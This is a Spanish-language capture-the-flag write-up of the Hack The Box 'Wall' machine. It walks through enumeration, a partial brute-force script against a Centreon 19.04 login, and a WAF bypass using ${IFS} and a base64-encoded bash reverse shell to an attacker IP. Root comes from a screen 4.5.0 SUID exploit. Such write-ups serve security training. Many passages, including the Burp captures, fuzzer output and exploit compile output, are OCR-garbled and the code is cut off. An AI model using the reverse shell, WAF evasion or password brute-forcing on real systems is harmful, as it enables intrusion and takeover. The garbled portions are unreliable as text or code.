

### 0. Introducción

En esta máquina, aprenderemos a evadir las medidas de un WAF que nos impide ejecutar ciertos comandos.

También veremos una forma de escalar privilegios, aprovechándonos de una versión del programa Screen (v.4.5.0).

### 1. Enumeración

Ejecutamos un ping contra la IP de la máquina víctima y obtenemos un TTL de 63. Por tanto, podemos pensar que la máquina víctima tiene un sistema operativo Linux.

Realizando un análisis de puertos abiertos, obtenemos lo siguiente:



Si comprobamos el launchpad, parece que nos estamos enfrentando a una máquina Ubuntu Bionic. Cuando consigamos el acceso a la máquina, comprobaremos si es cierto.

#### openssh 1:7.6p1-4ubuntu0.3 source package in Ubuntu

Changelog						
openssh (1:7.6p1-4ubuntu0.3) bionic-security; urgency=medium						
<ul> <li>SECURITY UPDATE: Incomplete fix for CVE-2019-6111         debian/patches/CVE-2019-6111-2.patch: add another fix to the filename         check in scp.c.         CVE-2019-6111</li> <li>Fixed inverted CVE numbers in patch filenames and in previous         changelog.</li> </ul>						
Marc Deslauriers <email address="" hidden=""> Mon, 04 Mar 2019 07:17:51 -0500</email>						
Upload details						
Uploaded by:	Uploaded to:					
Amarc Deslauriers on 2019-03-04	Bionic					
Original maintainer:	Architectures:					
a Ubuntu Developers	any all					
Section:	Urgency:					
net	Medium Urgency					

Dado que carecemos de credenciales para entrar por SSH, vamos a analizar el puerto 80 (HTTP). Empezamos con whatweb.

//hose/garrot/HTD/HTU //i \_\_Makweb\_http://10.10.10.157 http://10.10.10.157 [200 0K] Apache[2.4.29], Country[RESERVED][22], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu]], IP[10.10.10.157], Title[Apache2 Ubuntu Default Page: It works]

Nos dirige a la página web de por defecto de Apache Ubuntu. Vamos a "fuzzear".

<pre>wfuzz -c ************ * Wfuzz 3.1 ************************************</pre>	hc 404 - ************ .0 - The We ************	t 200 -w ********** b Fuzzer *********	<u>/usr/share</u> ************************************	:/wordlists/d	lirbuster/directc **** * ***	ory-list-2.3-medium.txt	http://10.10.10.157/FUZZ/ This site is asking you to sig Username
Total reque	sts: 220560	0.107,101					
ID							
00000083:		11 L	32 W	293 Ch			
000000014:			964 W				
000000012		275 1	064 W	10010 Ch	0.157//"		
000000013:	200	375 1	964 W	10918 Ch	"# license. \	vis	
					it http://cre	at	
					ivecommons.or	<b>'g∕</b> Jbuntu's Apache2 defa	
					3.0/"		
000003471:		14 L	54 W	459 Ch	"monitoring"		
000000001:		375 L	964 W	10918 Ch	"# directory-		

Encontramos el directorio "monitoring", que nos piden credenciales. Es un sistema denominado autenticación básica de apache. Podemos intentar hacer un pequeño bypass con Burpsuite. Capturamos la respuesta y la mandamos al "Repeater".

Request		Response
Pretty Raw Hex	🚍 \n 🚍	Pretty Raw Hex Render
<pre>1 POST /monitoring/HTTP/L1 2 (Hest: 0.10.15.157 3 (Hest-Agent: Nozille/5.0 (Windows NT 6.1; WGW64; Trident/7.0; rv:11.0) like ( 4 Accept: text/thi.application/shtml+xml,application/xml;q=0.9,image/webp,*/* 5) Accept-Language: en-US, en;q=0.5 6 (Accept-Encoding: gpip, deflate 7 (DMT-1) 2 (Comercino: close 9) Upgrade-Insecure-Requests: 1 10</pre>	Beckø s;q=0.8	1  HTTP/1.1 200 OK 2 Data: Fri, 16 Sep 2022 16:56:21 OMT 3 Server: Apache/2.4.29 (Ubuntu) 4 Last.Modified: Hed, 03 JUL 2019 22:47:23 GMT 5 ETag: 9a-58ccas5bade6-gzip* 6 Accept.Ranges: bytas 7 Vary: Accept.Encoding 8 Content.Length: 154 9 Connection: close 10 Content.Town: text/thml
n		
		12 di)= This page is not ready yet ! (his) (his) (his) (his) (should redirect you to the required page ! (his) (should redirect you to the required page ! (his) (should redirect you to the required page ! (his) (should redirect you to the required page ! (his)

¡Ummm! Centreon. Es un sistema de monitorización basado en Nagios. Lo conozco, he trabajo con él. Comprobamos si se abre la web de gestión.

# 2. Explotación y acceso.

0 👌 10.10.10.157/0



Nos fijamos en la versión (19.04.0). Vamos a comprobar si existe alguna vulnerabilidad.

¡Vaya! Pues hemos tenido suerte. Pero primero debemos conocer unas credenciales de acceso para poder explotar. ¿Serán válidas las de por defecto? Según hemos investigado en Google, por defecto las credenciales son admin/centreon.

Parece que no funcionan. Vamos a ver como se ejecuta la petición en nuestro amigo burpsuite. Está añadiendo un token, que varia en cada petición.



Es bueno saber este dato, ya que quiero intentar "bruteforcear" para conseguir la password. Nos escribimos el siguiente código.

bruteforce.py
#/usr/bin/python3
import requests from bs4 import BeautifulSoup
# URL a la que vamos a Inzar la peticion url = 'http://10.10.10.157/centreon/index.php'
s = requests.session()
def sendRequests(username, password): page = s.get(url)

©Dandy\_loco https://dandyloco.github.io/



Ejecutamos el script y obtenemos las siguientes credenciales:

<pre>/home/parrot/HTB/wall</pre>		1m	52s		
python3 <u>bruteforce.py</u>					
*] Probando: 123456					
*] Probando: 123456789					
[*] Probando: 111111					
[*] Probando: password					
[*] Probando: qwerty					
*] Probando: abc123					
*] Probando: 12345678					
[*] Probando: password1					
Credenciales encontradas	admin	:pas	swor	d1	

Vamos a comprobarlo en la web y efectivamente, entramos.



Ahora que tenemos credenciales, intentamos ejecutar el exploit. Sin embargo, aunque se ejecuta, no conseguimos que nos dé una "reverse shell". Vamos a analizar lo que hace el exploit, para intentar ver qué está fallando.

Por lo que vemos accede a la web, .../main.get.php?p=60901 y rellena el campo nagios\_bin.



Navegamos a la web, y probamos a realizar los cambios de forma manual. Nos da un "forbiden", puede haber algún tipo de WAF?

② SSH port	22
Monitoring Engine Information	
⑦ Monitoring Engine Init Script	centengine
⑦ Monitoring Engine Binary	/usr/sbin/centrpnnagios
⑦ Monitoring Engine Statistics Binary	/usr/sbin/centenginestats
⑦ Pertdata file	/var/log/centreon-engine/service-perfdata

10.10.10.157/centreon/main.get.php?p=60901

# Forbidden

 $\mathbf{C}$ 

You don't have permission to access /centreon/main.get.php on this server.

Apache/2.4.29 (Ubuntu) Server at 10.10.10.157 Port 80

Vamos a intentar "bypassear" el control evadiendo ese WAF. Para ello vamos codificar nuestra revershell en base64 de la siguiente forma:



Ahora, el comando que queremos ejecutar en Centreon, debe tener una decodificación antes de su ejecución. Como el comando tiene espacios, para que no den problemas, debemos usar "\${IFS}". Es como el %20 en la codificación URL.

 echo\${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42My80NDQ0IDA+JjEK|base 64\${IFS}-d|bash;

Pero por alguna razón no conseguimos acceso, aunque no nos de error. Probamos metiendo directamente el código en el exploit.



Nos ponemos en escucha con rlwrap (nos evitaremos hacer el tratamiento de la TTY) y ejecutamos el exploit.

• rlwrap nc -nlvp 4444

Ahora mismo estamos con el usuario www-data.

uid=33(www=data)\gid=33(www-data) groups=33(www-data),6000(centreon) www-data@Wall:/usr/local/centreon/www\$

# 3. Escalada de privilegios

Comprobamos que efectivamente estamos ante una máquina con una versión de Ubuntu Bionic, tal y como habíamos visto investigando el launchpad.



Realizamos un reconocimiento sobre los ficheros en los que tenemos permisos de SUID, y nos llama la atención screen-4.5.0.



Buscamos si tiene vulnerabilidades y justo nos ofrece una forma de escalar privilegios.



Nos copiamos el script a la máquina víctima, en el directorio /tmp/ y lo ejecutamos. Con esto, hemos conseguido ser root.

^^www /sir/sharesexploitablesploits/linux/local/41154.sh Use chrootbourne-Maain shell script, ASCII text executable tmp/rootshell.c: In function 'mmin': tmp/rootshell.c:3:5: warning: implicit declaration of function 'setuid'; did you mean 'setbuf'? [-Wimplicit-function-declaration] setuid(0); ^/wwww مستمس الدون // المسلم العرب من / حدول من العرب المالة ( العرب العرب العرب العرب العرب العرب العرب المسلم ( الع setbuf isr/share/exploited tab/syntatics/time/local/dilSt.ch tmp/rootshell.c:5:5: warning: implicit declaration of function 'seteuid'; did you mean 'setbuf'? [-Wimplicit-function-declaration] seteuid(0); seteuid(0); ph ("Anwanness of the physical phy 

// Now we create our /etc/ld.so.preload file... +] Now we create our /etc/ld.so.preload file... from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.

+] done!<u>xcallation.sh</u> o Sockets found in /tmp/screens/S-www-data.

ami